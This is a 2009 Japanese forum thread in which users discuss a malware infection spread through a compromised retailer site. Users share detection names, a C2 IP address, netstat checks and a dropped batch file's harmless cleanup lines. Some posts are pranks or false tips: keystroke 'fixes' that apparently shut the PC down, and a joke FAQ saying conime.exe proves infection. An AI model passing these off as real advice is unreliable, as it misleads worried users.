カスペルスキーは反応しなかった
503 コバノランタナ(千葉県):2009/04/07(火) 02:19:59.13 ID:hD4R3NI8
>>498
おそらくそう。
結局、本来の流れだと書き換えられたjQuery.jsの中の処理の結果、
この↑でうpされたexeが仕込まれてしまう訳で、
結局、書き換えられたjQuery.jsを実行せずに未然に防げば
理論上はPCが感染する事はない訳で。

だから現状の各アンチウィルスソフトの対応内容だけで殆ど問題ないのかとは思うけど、
ただ、気になるのはu.batで具体的にどんな処理をしてるのかってこと。
ぶっちゃけ、u.batの中身が判れば殆ど全貌が明らかになるって事かと。
504 ノウルシ(東京都):2009/04/07(火) 02:20:20.84 ID:S5Nxy0vV
>>502
更新処理はしてるよな?
505 カラタネオガタマ(関西・北陸):2009/04/07(火) 02:20:45.26 ID:OD8lLJOX
URLにkickbackがきてたら今回は危ないと認識してるよ
506 クモマグサ(愛媛県):2009/04/07(火) 02:22:34.55 ID:dlqb+X8n
>>504してる
507 ハナビシソウ(関西地方):2009/04/07(火) 02:22:34.56 ID:HRQhxBob
何となくsystem safety monitorが恋しくなってダウンロードを試みたら(検索)

一次配布サイト死亡
+
cowscorpion死亡
+
amebaメンテナンス

で萎えた
508 クロッカス(関東・甲信越):2009/04/07(火) 02:23:12.18 ID:XsxsDO6g
もうOS再インストールしようか…
感染したとき外付け繋いでたんだが、これを再インストールした後に繋いだらヤバい?
509 サトザクラ(関西地方):2009/04/07(火) 02:23:27.77 ID:gVHhPofa
>>507
comodoのDiffence+オススメ
単体でも使えるし
510 ハナビシソウ(関西地方):2009/04/07(火) 02:24:15.71 ID:HRQhxBob
>>508
PC内にウイルスがにゅるにゅる侵入してきてビクンビクンッ・・・っん!!!!ってなる
511 クロッカス(東日本):2009/04/07(火) 02:24:58.47 ID:v2pFr5JY
>>508
まぁまて。
512 シンフィアンドラ・ザンゼグラ(アラバマ州):2009/04/07(火) 02:26:01.08 ID:aXhN0DBC
既出かもしれんが、裏でコマンドプロンプト上のソフトを動かしてるアプリもある。
そういうソフトを動かした場合はconime.exeがタスクにあっても普通。
例えばMediaCoderとか。
513 ラフレシア(アラバマ州):2009/04/07(火) 02:29:29.54 ID:zpJqoahS
何でこんなに踏んでる馬鹿多いの?w
514 タツタソウ(長屋):2009/04/07(火) 02:30:46.56 ID:6QT6OWSq
そこに山があるから登るってやつだ
ドMどもが
515 ラフレシア(東京都):2009/04/07(火) 02:31:34.53 ID:Yn6ot/oR
産廃屋なので担当者の脳も産廃レベルでございますってか、まだ残りまくりw
516 サイネリア(栃木県):2009/04/07(火) 02:32:28.94 ID:cc2QZmb2
URLは踏んでないけどJaneのキャッシュがどうのこうのってのが気になる
517 シュロ(catv?):2009/04/07(火) 02:33:09.24 ID:r7jE83We
村岡わろた
518 ミゾコウジュミチノクコザクラ(関西地方):2009/04/07(火) 02:34:04.91 ID:e12iyH9b
http://tsushima.2ch.net/test/read.cgi/news/1238844402/536

536 名前: SM-3(茨城県)[sage] 投稿日:2009/04/05(日) 01:15:16.14 ID:0Dln3hZK
ルートにu.batってのが作られてたorz
中身は以下のとおり

:Z
DeL "K:\_.t"
IF EXIST "K:\_.t" GOTO Z
DeL "K:\u.bat"

こことは関係ないかもしれんが何かにやられたのか確実だorz


u.batの中身は↑らしい
519 ジョウシュウアズマギク(北海道):2009/04/07(火) 02:34:18.46 ID:xLYVVH7x
>>452
詳しく調べてないが、IE向けの攻撃コードの中に
flashのマイナーバージョンを判別してる箇所がある。
マイナーバージョンの2つ目(x.x.[ここ].x)が124以上なら攻撃用swfは読み込まれない。

以上のことからして、flash player 9.0.124 未満に存在する脆弱性をつくswfだと推測
520 ウィオラ・ソロリア(鳥取県):2009/04/07(火) 02:34:47.14 ID:Lt2HjeXf
ttp://eeepc.cocolog-nifty.com/blog/2009/04/geno-560d.html

ここ見る限りでは大丈夫そうだけどどうだろ・・・。
また明日やってみるか。
521 セイヨウオダマキ(北海道):2009/04/07(火) 02:35:05.42 ID:MbZc4uSk
VIPで貼られてたURLって全部大丈夫なん?
522 カンパニュラ・ベリディフォーリア(北海道):2009/04/07(火) 02:35:57.74 ID:KeanbF3e
>>521
VIPで死ね
523 雪割草(岐阜県):2009/04/07(火) 02:36:49.84 ID:TDbc8y/e
>>521
全部スーパーミラクルデンジャラスですさようなら
524 シンフィアンドラ・ザンゼグラ(アラバマ州):2009/04/07(火) 02:37:04.72 ID:aXhN0DBC
踏んで構わんマシンで踏んだ後でカスペのオンラインスキャンやってみた結果。
IEのテンポラリに残ってた。
jquery[1].js 感染:Trojan-Downloader.JS.Agent.dwf
A0G6M8XZ\Vy[1].pdf 感染:Exploit.Win32.Pidief.aog

Avast!は最新版でも、このファイルを検出しなかった。
Avast!入れてて安心してる人はカスペでもスキャンしてみるといいかも。
どなたかの参考になれば幸い。
525 キクザキイチゲ(福島県):2009/04/07(火) 02:38:37.51 ID:VlSg0wKV
セキュ板のAviraスレより
---------------------------------------------------
122 名無しさん@お腹いっぱい。 [sage] 2009/04/07(火) 00:16:22
Geno ウイルス、 PDF と exe には対応したようだ。

\dropper.pdf
[0] Archive type: PDF Stream
--> Object
[DETECTION] Contains recognition pattern of the EXP/Pidief.vtb exploit
[WARNING] The file was ignored!
\dropper.swf'
\malformed.jquery.js'
\monitor.bin'
\dropper.bin'
[DETECTION] Contains a recognition pattern of the (harmful) BDS/Agent.afid back-door program
[WARNING] The file was ignored!
\dropper.html'
526 レブンコザクラ(鹿児島県):2009/04/07(火) 02:39:07.67 ID:6nwQ/pkx
・Foxit Readerなので、Adobe Readerはインストールしていない。
・Flashは、常に最新版をインストール済み。
・最新版 Firefox + NoScript(Scriptオフ) + FlashBlockでネットしている。

Windows XPだけど、変なプロセスやあやしい挙動も無いしセーフ。
ああ、良かった。
527 エイザンスミレ(長屋):2009/04/07(火) 02:39:34.67 ID:8Claia4S
>>513
PCの安売りスレに出入りしてるとGENOは日常的に訪れるサイトのひとつだろ。
俺はν速にスレが建ってからはGENOに行っていないがけど
最後に行ったのが4/4の前だったか後だったか覚えてないので不安を抱いてる
528 ビオラ(アラバマ州):2009/04/07(火) 02:39:51.83 ID:bWQ+iy28
>>524
それはAdobe Readerが最新(9.1)じゃない状態で?
529 サトザクラ(香川県):2009/04/07(火) 02:40:43.93 ID:uMXDAm/q
少しまえにこれ踏んでしまたかもしれないのだけどどうやって感染してるかわかるの?
530 ヒメオドリコソウ(コネチカット州):2009/04/07(火) 02:41:58.40 ID:IXgeH8s2
Live2ch最強
531 カンパニュラ・ベリディフォーリア(北海道):2009/04/07(火) 02:42:08.75 ID:KeanbF3e
>>529
このスレのログぐらいは全部読めよカス
532 サンシュ(神奈川県):2009/04/07(火) 02:42:25.45 ID:1n2t/ThP
リーダーとフラッシュの脆弱性が原因に挙げられてるけど、これって
・リーダーが最新版でない「かつ」フラッシュが最新版でない
・リーダーが最新版でない「または」フラッシュが最新版でない
のどっちがウイルスにやられるの?
533 オウレン(埼玉県):2009/04/07(火) 02:42:31.21 ID:J9fZ7s49
もう実害でるまで放っておけよ
534 エイザンスミレ(長屋):2009/04/07(火) 02:42:48.55 ID:8Claia4S
>>524
参考になった
マジ産休
でもカスペのオンラインスキャンって一度avast!をアンインスコしなきゃ駄目なんだよな
あー面倒だ
535 ボケ(アラバマ州):2009/04/07(火) 02:43:20.17 ID:uu+cxq1W
>>529

代表的なウイルス感染時の特徴ってのが前スレにある

http://tsushima.2ch.net/test/read.cgi/news/1239009596/24

536 サイネリア(北海道):2009/04/07(火) 02:44:37.16 ID:5+Bph+6x
>>513
馬鹿だからだろw
537 ナガバノスミレサイシン(チリ):2009/04/07(火) 02:45:13.47 ID:8WV64lMi
重くならないなら何の情報でもくれてやるのに
538 レンギョウ(福岡県):2009/04/07(火) 02:46:09.40 ID:2dIxmbNg
>>527
最後にゲノが四月二日なんだよな、助かったマジで
539 ラフレシア(東京都):2009/04/07(火) 02:47:23.40 ID:Yn6ot/oR
「PCの安売りスレに出入りしてるとGENOは日常的に訪れるサイトのひとつだろ。 」

wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
540 パンジー(コネチカット州):2009/04/07(火) 02:49:07.77 ID:D2Opdrnq
特効薬みたいなの無いの?
食らったら死ぬまで?
541 オウレン(埼玉県):2009/04/07(火) 02:49:08.91 ID:J9fZ7s49
GENOが安いとか冗談よしてくれ
542 トキワハゼ(茨城県):2009/04/07(火) 02:49:22.32 ID:ldIkAydW
       ( ・ω・)  んもー
       ○={=}〇,
        |:::::::::\, ', ´
、、、、、、、、、、、し 、、、(((.@)wwwwwwwwwwwwwwwwwwww
543 イヌノフグリ(静岡県):2009/04/07(火) 02:49:51.55 ID:voi8VD7d
結構強烈なウイルスなのに緊急ワクチンでないのはなぜ
544 ツルハナシノブ(東京都):2009/04/07(火) 02:50:09.87 ID:toRvHptP
88 名前: 名無しさん [sage] 投稿日: 2009/04/06(月) 20:44:37 0
まさかのウイルス対策セール来た!!!

しかもそのページでウイルス反応アリwwwwwwwwwwww

http://up2.viploader.net/pic/src/viploader970234.jpg


もはや伝説レベル
545 ヤエザクラ(dion軍):2009/04/07(火) 02:51:06.54 ID:xoTLHzSd
>>505
そのレスでjane使いの俺はカカっとツール→キャッシュ一覧で
kickbackとurl検索した俺に隙はなかった
546 サトザクラ(香川県):2009/04/07(火) 02:51:15.35 ID:uMXDAm/q
>>535
これいくつ当てはまるとアウト?
547 マムシグサ(dion軍):2009/04/07(火) 02:51:16.70 ID:Pgq7lh9W
>>519
詳しい情報、ありがとう
まぁよくよく考えてみたらサーバに仕込まれたファイルなんだから
全く無害のファイルとは考えられないわな
548 トベラ(アラバマ州):2009/04/07(火) 02:51:43.00 ID:sNbTeZlz
>>535
それは当てにならない
549 コバノランタナ(千葉県):2009/04/07(火) 02:54:29.10 ID:hD4R3NI8
>>518
どもども。

今どうにかUPXアンパッカーをインスコしてUPX圧縮を解除して
再度La.exeの中を見たら、↓の通りそのu.batの中身と殆ど同じような文字列が書かれてたわ。

ttp://up2.viploader.net/pic/src/viploader970581.jpg

推察だけど、このexeファイルがu.batを生成して、その上でu.batを実行してるのかと思う。

ただ、その中身だとKドラにある_tっていうフォルダを消しているだけなんだけど、
その中身がなんなのかが判らないな。
550 サイネリア(鳥取県):2009/04/07(火) 02:54:33.57 ID:DSBv+rQc
で、Flashは入れてるけどReaderは入れてない俺は大丈夫なの?
551 オウギカズラ(東日本):2009/04/07(火) 02:54:41.59 ID:n3z6eb+u
>>544
ワロス
552 シザンサス(北海道):2009/04/07(火) 02:54:46.46 ID:1AT369Zt
今の所簡単に分かるのは再起動してブルスクになるかどうかだろう
まぁ、感染してたら帰ってこれないけど
553 カラタネオガタマ(関西・北陸):2009/04/07(火) 02:55:10.88 ID:OD8lLJOX
>>545
kickback自体は危ないわけではなさそう
でもこの騒動でkickbackは何回か見てるから警戒しといた方がいいな
554 トキワハゼ(catv?):2009/04/07(火) 02:55:11.11 ID:YvLpO/2t
ThinkPadとかメーカ独自のソフトが動いてるのもあるからconime.exe云々はあてにならん
それよりモデムやルータのアクセスログでも見たほうがマシ
ログに該当IPがあったらどっちにしてもアウトだがw
555 アルストロメリア(愛知県):2009/04/07(火) 02:55:15.95 ID:PpAfGl6U
GENOとかゴミサイトだろ
ショップインバース ユーズドファクトリー PCパレット とかのがいい
556 カンパニュラ・アーチェリー(アラバマ州):2009/04/07(火) 02:57:17.49 ID:2HRGu6kF
CTRLおしながら A O
557 ビオラ(アラバマ州):2009/04/07(火) 03:03:12.49 ID:bWQ+iy28
>>550
脆弱性はFlash Playerのバージョン10.0.12.36以前に存在する。
ユーザーが悪意のあるSWFファイルを閲覧した場合、
システムが外部から制御される恐れのある、危険度の高い脆弱性とされている。
558 サイネリア(北海道):2009/04/07(火) 03:03:44.06 ID:5+Bph+6x
>>546
全部嘘だから
559 シラネアオイ(福島県):2009/04/07(火) 03:05:53.73 ID:ZlGID39V
Flash Playerのバージョンはどこで確認するのん?
560 ハナワギク(北海道):2009/04/07(火) 03:05:55.33 ID:mSg2gEOd
>>519
WIN 10,0,12,36だた。
最近ウィンドウズのアップデイトはした。
アクロバットリーダーだけがver8なんだよなあ。

もしかして三つの要件が揃わないと発病しないのかな?とオレはオレは楽観主義者を気取ってみる。
561 ミゾコウジュミチノクコザクラ(千葉県):2009/04/07(火) 03:06:34.18 ID:Q/4eCO8y
windowsキー→Uキー二回(素早く

これを一回やってみた方がいい
562 コメツブツメクサ(青森県):2009/04/07(火) 03:07:16.47 ID:yuvoUWjb
>>559
Flash上で右クリックから
563 ハナワギク(北海道):2009/04/07(火) 03:08:57.96 ID:mSg2gEOd
>>559
「flash player バージョン確認」でググると一件目に
564 コバノランタナ(千葉県):2009/04/07(火) 03:10:10.28 ID:hD4R3NI8
>>559
↓のアドビのサイトに行くと画面にバージョン情報は表示されるよ。

ttp://www.adobe.com/software/flash/about/
565 サトザクラ(東京都):2009/04/07(火) 03:11:58.25 ID:PhPivuLf
>>560
1つでも要件を満たせばアウトというのが最近の流れ
566 ミヤマアズマギク(愛知県):2009/04/07(火) 03:12:43.97 ID:NHRLmOz1
特価品496
http://pc11.2ch.net/test/read.cgi/jisaku/1238831329/

908 名前:Socket774[sage] 投稿日:2009/04/07(火) 02:47:19 ID:UBlDf3UC
検出されたとかされないとか笑える
トロイなんだから本体が検出されるわけねーじゃんw
カス速民全滅しろや

909 名前:Socket774[sage] 投稿日:2009/04/07(火) 02:49:04 ID:ckw6xCI9
ν速民以外だろそのスレにいるのは
いろんなとこに貼られてるからカスどもが集まってる
567 レンギョウ(福岡県):2009/04/07(火) 03:13:39.54 ID:2dIxmbNg
>>560
10.0.12.36も欠陥品なので早くアップデートしれ
568 サイネリア(鳥取県):2009/04/07(火) 03:16:38.92 ID:DSBv+rQc
avastとAviraでやってみたけど何も出てこなかった。
netstat -aと-nbもやってみたけど、94.247.2.195はなかった。
569 キンケイギク(神奈川県):2009/04/07(火) 03:19:30.49 ID:FwqqVpws
java scriptとActiveX切ってれば大丈夫?
570 シラネアオイ(福島県):2009/04/07(火) 03:19:42.79 ID:ZlGID39V
トンクス
571 シンフィアンドラ・ザンゼグラ(アラバマ州):2009/04/07(火) 03:20:25.04 ID:aXhN0DBC
>>528
その後アップデートしたけど、8.13で踏んだと思う。
572 シザンサス(北海道):2009/04/07(火) 03:20:53.92 ID:1AT369Zt
それにしても村岡sexyウイルス猛威奮いすぎだろ
573 キランソウ(福岡県):2009/04/07(火) 03:21:07.24 ID:01FCm4gy
次スレから「良くある質問回答集」をテンプレに入れろw
574 サトザクラ(dion軍):2009/04/07(火) 03:21:27.35 ID:ly823CjS
>>566
あ?
575 プリムラ(アラバマ州):2009/04/07(火) 03:22:38.72 ID:d7bLAbt0
俺なんだかんだで感染してなかったみたい
outpostが変な反応したんでアプリケーションが再起動するまで
遮断するを選択してセーフだったみたい ラッキー
576 ボロニア・ピンナタ(長屋):2009/04/07(火) 03:25:06.64 ID:9H6YK50+
>>573
お前がテンプレ作っておけよ
577 アメリカヤマボウシ(千葉県):2009/04/07(火) 03:27:32.35 ID:txSwIiZQ
なんかよくわからんがvistaなら問題ないっぽいのか?
まぁとりあえず色々判明するまでこのスレ監視だな
578 ハナビシソウ(関西地方):2009/04/07(火) 03:29:38.94 ID:HRQhxBob BE:158713872-2BP(0)

どうでもいいけど保存しておいたssmをインスコして起動するには再起動が必要みたいだから
既に入ってたcomodoのdefense+をonにして念には念をとparanoidモードにしたらProcess Governerあたりと干渉して何も出来なくなった
ようするにタスクマネージャーでcomodoデーモンを止めようとする→defense+が発動する無限ループの状態

結局再起動せざるを得なくなった
579 ビオラ(アラバマ州):2009/04/07(火) 03:33:00.55 ID:bWQ+iy28
Flash Playerに危険度の高い脆弱性、対策済みの新バージョン公開
>アドビでは、脆弱性を修正したFlash Playerのバージョン10.0.22.87を公開。
http://internet.watch.impress.co.jp/cda/news/2009/02/25/22574.html

「Adobe Reader 9.1」「Acrobat 9.1」公開、深刻な脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2009/03/11/22742.html

INTERNET Watchとか見てない人はいちいち最新のにしないかもね
580 ハナワギク(北海道):2009/04/07(火) 03:35:12.36 ID:mSg2gEOd
つかFlashPlayer以上にAdobeReaderなんて普通の人間はアップデートしないんじゃないのかなあ。
581 ハナビシソウ(関西地方):2009/04/07(火) 03:37:51.47 ID:HRQhxBob
>>573
[Q.]感染してそうですが、大丈夫ですか???!!
[A.]タスクマネージャのタスク一覧にconime.exeがあればアウト

[Q.]対処法はありますか?
[A.]
├ 1.再インストール
│                              
│    [まちがい]                         
│      確実な方法ではありますが、時間がかかるのが難点です。
│      それよりも別の手段を探してみませんか?
│      ちょっとしたフリーウェアでなんとかなるかも?
│              ↑
│          ココがポイント!

└ 2.RegSeekerを使う

      [せいかい]

[Q.]予防策はありますか
[A.]
├ 1.諸々の脆弱性情報に気を配り、常に最新版を利用する
│   Comodo Firewall、Avira Antivirと必要に応じてDefense+も導入する。もちろんブラウザはOpera  
│                     
│    [まちがい]                         


└ 2.RegSeekerを使う
      [せいかい]
582 ダイアンサス ピンディコラ(アラバマ州):2009/04/07(火) 03:38:36.16 ID:8lz+ZMg5
こういう時ほどコピペブログは役に立たんな
583 コバノランタナ(千葉県):2009/04/07(火) 03:39:18.51 ID:hD4R3NI8
>>580
自動アップデートチェックはみんな切って使ってる筈だからね。

24も終わったし生ウィルス扱って無駄にテンション張って疲れちゃったから
そろそろ寝るわw
584 キランソウ(福岡県):2009/04/07(火) 03:40:32.75 ID:01FCm4gy
       / ̄\
      | ASUS |
       \_/
       _|__
      /\ /\ excellent !!
    /  ⌒  ⌒ \
     |   (_人_)   |    >>581乙 よくぞまとめた
    \   `⌒´  ..X─/  褒美として P5Qシリーズ を買う権利をやる
      ヽ▼●▼<  ||ー、.
     /  |。| |/   ヽ(ニ、`ヽ.
    .l   |。| | r-、y `ニ  ノ
585 コバノランタナ(千葉県):2009/04/07(火) 03:40:32.94 ID:hD4R3NI8
>>582
連中はリスク負う事は何もしないからなw
他人のふんどしで飯食う事しか眼中になくて腐ってるわ。
586 水芭蕉(中部地方):2009/04/07(火) 03:42:43.22 ID:aRhF2J1+
さっそく斧にあげられたテスト用のウイルスをばら撒きだしたヤツがいるな
587 トキワハゼ(茨城県):2009/04/07(火) 03:43:02.74 ID:ldIkAydW
初期のFlashPlayer10がブラクラ並に重かったから未だにver9を使ってる俺
現行のver10って軽くなった?
588 スィートアリッサム(アラバマ州):2009/04/07(火) 03:45:07.24 ID:qxFx8kHE
>>587
別に、初期のころからの奴も
重く感じたことなんてないなぁ
動画サイトみたって、精々cpu使用率10%行くか行かないかだし
589 キランソウ(福岡県):2009/04/07(火) 03:46:33.86 ID:01FCm4gy
>>587
PCが年寄りなんじゃね
590 トベラ(アラバマ州):2009/04/07(火) 03:47:10.45 ID:sNbTeZlz
>>581
http://www.google.co.jp/search?hl=ja&q=conime.exe&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=&aq=f&oq=

こういうのってわざと間違ったこと書き込んでるのか?
591 ミヤコワスレ(兵庫県):2009/04/07(火) 03:47:35.90 ID:AeFWlFj7
p://www.geno.co.jp/4D/images/top/banner_owabi.gif
たったこれだけかよw
592 サイネリア(鳥取県):2009/04/07(火) 03:48:14.73 ID:DSBv+rQc
デスクトップだけで10%くらいメモリ使ってるってことは、感染してるかもしれんのかね
593 キンケイギク(神奈川県):2009/04/07(火) 03:48:39.03 ID:FwqqVpws
9のdebug版使えよ
594 ハナワギク(北海道):2009/04/07(火) 03:49:00.51 ID:mSg2gEOd
タスクマネージャー→パフォーマンスを開くと開いた瞬間は70%ぐらいで直ぐに1桁台になるんだが
なんかウラでやってるよなあ。
595 シンビジューム(東京都):2009/04/07(火) 03:49:18.42 ID:vN/PZVTj
このトロイは一番抜いてるエロ動画がなにかバレてしまう
596 シナノコザクラ(福岡県):2009/04/07(火) 03:49:22.20 ID:se8lpk3k
>>587
重いか軽いかは分からんがスクリプトで実行速度が〜ってのがよく起こった
IE更新したら直ったからIEのせいかもしれんが
597 クワガタソウ(京都府):2009/04/07(火) 03:49:47.13 ID:XoAk2RBo
>>595
これはヤバイ
598 シラネアオイ(福島県):2009/04/07(火) 03:50:39.14 ID:ZlGID39V
このウィルス国産なのかどうか知らんけど世界中に拡散して
一向に解決されなかったら酷いことになりそうだな
599 アカシデ(高知県):2009/04/07(火) 03:52:42.55 ID:+CcDYYrA
GENOの名が世界中に知れ渡るね
600 サトザクラ(dion軍):2009/04/07(火) 03:53:11.08 ID:ly823CjS
それが狙いか・・・!
601 レウイシア(アラバマ州):2009/04/07(火) 03:53:29.62 ID:hxopJUfl
まさにPC界の鳥インフ
602 ハナビシソウ(関西地方):2009/04/07(火) 03:54:42.85 ID:HRQhxBob
>>590
この流れをしっかり踏襲しただけのことさ

562 名前: キバナスミレ(関東・甲信越)[] 投稿日:2009/04/05(日) 17:25:01.57 ID:vha5s7Cg
>>553
俺AdobeReaderなしFlash最新版でその上Javaスクリプトoff、ActiveXもoffで踏んだのに感染した
ちなみにセキュリティソフトはNIS2009
今の所どんな対策しても感染は防げないんじゃないか
577 名前: キバナスミレ(関東・甲信越)[] 投稿日:2009/04/05(日) 17:42:12.62 ID:vha5s7Cg
>>570
アクセスしたらマウスの動きが重くなったんで、おかしいなと
そんでnetstatコマンド打ったら94.247.2.195と通信してた
そしたらコマンドプロンプトが突然落ちた
その後タスクマネージャ見たらconime.exeが動いてた
603 シラネアオイ(北海道):2009/04/07(火) 03:54:54.01 ID:bCOZy87X
堀宮のサイトもトロイが出たらしいが
604 クロッカス(コネチカット州):2009/04/07(火) 03:56:26.21 ID:qo7ZGd7o
春休みが明けてからで良かった
605 キランソウ(福岡県):2009/04/07(火) 03:57:26.35 ID:01FCm4gy
>>590
CMD.exeを実行して閉じてタスクマネージャ見てみ、conime.exeがあるから。
CMD.exeを使ってないしCMD.exeを使うソフトを入れてないのにconime.exeがあったら
何かがCMD.exeを使ったってこと。
606 トキワハゼ(茨城県):2009/04/07(火) 03:59:38.53 ID:ldIkAydW
>>588>>589>>596
ちょっとしたバナー広告でも固まったんだわ
他のブラウザ入れてみるか
607 サイネリア(鳥取県):2009/04/07(火) 04:04:54.24 ID:DSBv+rQc
>>605
ttp://hpphmd.blog104.fc2.com/blog-entry-15.html
てあるけどconimeがあったら感染してるってこと?
608 トベラ(アラバマ州):2009/04/07(火) 04:05:56.06 ID:sNbTeZlz
conime.exeはコマンドプロンプトで日本語入力をするためのもので、コマンドプロンプトを起動させると一緒に起動する。
よって無害。CMD終了しても残ってるけどなw

ためしに、CMD起動→conime終了やってみながら日本語入力試してみろよ。
Alt+半角/全角 で終了前なら入力できるけど、終了後はできないだろ?

おれもさっき知ったけど、まともな頭ならこの位ググれば出てくる。

1 CMD起動
2 Alt+半角/全角 で日本語入力してみる
3 Alt+半角/全角 押してオフにする
4 conime.exe終了
5 Alt+半角/全角 押してオンにできるかやってみる
609 サトザクラ(関西地方):2009/04/07(火) 04:07:07.09 ID:gVHhPofa
一度コマンドプロンプトを起動したら終了してもconime.exeは動き続けるよ
タスクマネージャから終了しても何の問題もないけれど
610 キランソウ(福岡県):2009/04/07(火) 04:11:19.07 ID:01FCm4gy
>>609
conimeが使ったメモリ空間は終了させても開放してくれないのがMS公認の仕様らしいが
微々たるものか
611 キランソウ(福岡県):2009/04/07(火) 04:12:26.16 ID:01FCm4gy
>>607
>netstat -aと-nbもやってみたけど、94.247.2.195はなかった。
612 コバノランタナ(千葉県):2009/04/07(火) 04:18:03.01 ID:hD4R3NI8
>>607
このウィルスを食らった場合以外でも自分でコマンドプロンプトを立ち上げた場合とか、
それ以外の場合でも何かアプリケーションをインストールしてWindowsを再起動した直後の場合とか、
既にインストールされているアプリケーションが起動される際に何気に勝手にコマンドプロンプトを使っている場合もあるので、
必ずしもconime.exeが実行されていたからと言って、必ずしもウィルスに感染しているとは限らない。

おいらが言ってる事が理解出来ないレベルなら、
あれこれ考える前にとっととリカバリするなりクリーンインストールし直したほうがいいよ。
613 シナノコザクラ(福岡県):2009/04/07(火) 04:18:57.40 ID:se8lpk3k
とりあえず普通に再起できて94.247.2.195と通信してなかったらセーフでおk?
614 水芭蕉(中部地方):2009/04/07(火) 04:20:49.27 ID:aRhF2J1+
なんか同じ流れがずっとループしてんな
615 コバノランタナ(千葉県):2009/04/07(火) 04:22:19.65 ID:hD4R3NI8
>>613
あれこれ考える前にとっととリカバリするなりクリーンインストールし直したほうがいいよ。
616 サトザクラ(千葉県):2009/04/07(火) 04:23:35.24 ID:5NnR5PGs
まとめサイトはまだ作られてないんだ
以前のイメピタとかニコニコに偽装してたzz.tcはすぐにまとめが作られたが今回は遅いな
617 タツタソウ(長屋):2009/04/07(火) 04:23:49.28 ID:6QT6OWSq
俺にも感染した
頭痛くてすんごい鼻水出る
618 シラネアオイ(福島県):2009/04/07(火) 04:24:04.87 ID:ZlGID39V
>>602
これが本当ならいよいよやばいな
619 サトザクラ(東京都):2009/04/07(火) 04:25:06.20 ID:Znka44KP
まだやってたのか
不安を抱えた情弱が騒いでるだけみたいだが
620 サトザクラ(東京都):2009/04/07(火) 04:25:53.92 ID:Znka44KP
この調子だと、無職で童貞なのもGENOのせいになりそうだな
621 トベラ(神奈川県):2009/04/07(火) 04:27:15.37 ID:3DmbuZMk
NoScriptは神。
622 コバノランタナ(千葉県):2009/04/07(火) 04:27:50.27 ID:hD4R3NI8
>>619-620
ここは過疎板のパソコン一般板とは違ってID出るから
あからさまな工作しても笑われるだけだよw
623 サトザクラ(東京都):2009/04/07(火) 04:29:01.38 ID:Znka44KP
>>622
何と戦ってるんだよ?
ウィルスとだけ戦えよ
624 ハハコグサ(埼玉県):2009/04/07(火) 04:31:38.95 ID:Yo3IP8nr
readerアンインスコした
625 シラネアオイ(福島県):2009/04/07(火) 04:32:37.94 ID:ZlGID39V
いっぽうイタリアでは大地震が起きて先に町があぼ〜んしていた
626 クワガタソウ(兵庫県):2009/04/07(火) 04:35:09.35 ID:ccuf3sBW
はじめてvistaで良かったと思ったw
627 レンギョウ(福岡県):2009/04/07(火) 04:35:13.82 ID:2dIxmbNg
>>625
今知った、大変ねえ
628 イヌガラシ(福岡県):2009/04/07(火) 04:39:39.76 ID:Mv15cr1Z
ウイルスなんて見て見ぬふりですよ
629 ハナワギク(北海道):2009/04/07(火) 04:39:46.80 ID:mSg2gEOd
>>625
正直、北朝鮮のミサイルよりもイタリア直下型大地震よりもGENOウイルス俺直撃事件の方がうんと重大だわ。
630 サルトリイバラ(埼玉県):2009/04/07(火) 04:41:17.89 ID:vH1jay46
なんだMacは論外なのか寂しいじゃないか
631 キエビネ(千葉県):2009/04/07(火) 04:41:40.95 ID:EGTFuo2i
AdobeReaderインストールしてないで
代わりに別のPDFソフト使ってるんだが大丈夫かな
632 福寿草(愛媛県):2009/04/07(火) 04:42:52.73 ID:nUHNYs1C
>>626
初めてXPで泣いた
633 トベラ(神奈川県):2009/04/07(火) 04:45:07.99 ID:3DmbuZMk
>>630
MacのSafariは数年前のブラクラも防げない代物だから使えない。
634 ジョウシュウアズマギク(埼玉県):2009/04/07(火) 04:45:38.84 ID:xUULCnhB
初めてNoScriptってやつを入れてみたがサイト開くたびにいちいち禁止されてます出てくるのが便利だが煩わしいな
慣れるまでの辛抱か
635 トベラ(神奈川県):2009/04/07(火) 04:53:24.67 ID:3DmbuZMk
636 サンダーソニア(アラバマ州):2009/04/07(火) 04:54:06.39 ID:mt+XV+oP
ツールバーを右クリック→カスタマイズでnoscriptのアイコンをツールバーに追加しておけばいいんじゃないかな。
そうするとオン・オフの切り替えがやりやすい。ステータスバーにも一応表示されてるけど。
あと、ブロックしたとかの通知のオン・オフはオプションで消せるよ。
637 ミゾコウジュミチノクコザクラ(アラバマ州):2009/04/07(火) 04:54:12.01 ID:PsrmxHIf
お前らRegSeekerから幾ら貰ってるんだよw
638 トベラ(神奈川県):2009/04/07(火) 04:58:26.74 ID:3DmbuZMk
>>634
ホワイトリストを作成するのに結構時間がかかるよ。
639 セントウソウ(茨城県):2009/04/07(火) 05:00:03.39 ID:ngCPrkrm
GENOのサイトは完全復旧したの?
まだトロイ仕込まれたまんま?
640 ポピー(大阪府):2009/04/07(火) 05:00:31.81 ID:1RBQpE7e
見つけられんが空き容量が減っていってる
これは黒と思うべきか…
641 モモイロヒルザツキミソウ(東京都):2009/04/07(火) 05:00:45.88 ID:5kO5BSyb
>>634
自己責任で大丈夫そうなやつとかはWhitelistに入れればいいだけだし
ヘンなモンもらうより全然マシだよ
642 ラナンキュラス(アラバマ州):2009/04/07(火) 05:08:22.38 ID:6H4/EZWZ
今回の件でgenoと電話が繋がったりメールで対応来たひといるん?
643 アルストロメリア(アラバマ州):2009/04/07(火) 05:13:22.84 ID:t0UikMAx
大丈夫そうな奴をリストに入れておいても
それが今回のようにハッキングされたら一緒なんじゃ…
644 クロッカス(東日本):2009/04/07(火) 05:24:03.84 ID:v2pFr5JY
>>640
Avast!いれてそれでも心配ならおいで
645 オオニワゼキショウ(東京都):2009/04/07(火) 05:25:13.49 ID:7byi+D1j
なんだこれやばかったのか。
ほとんど報告が無い頃に踏んじゃって、
何だこのサイト異常にメモリ食ってブラウザ落ちるなーと思って何回か開いちゃった。
その後再起動とかもしてるけど特にPCに違和感は無い。
XP、火狐、AVGなんだが大丈夫かな?
646 ボケ(アラバマ州):2009/04/07(火) 05:30:59.75 ID:q3zwGegJ
>>645
再起動とかもしてるけど特にPCに違和感は無い。
XP、火狐、AVGなんだが大丈夫かな?

これで大丈夫だと思えるのが不思議
647 クロッカス(dion軍):2009/04/07(火) 05:37:50.25 ID:KCpL443s
地味に伸びてるね。もう6か
GENOもしかしてまだ対策してないの?とりあえず閉鎖くらいしろよ
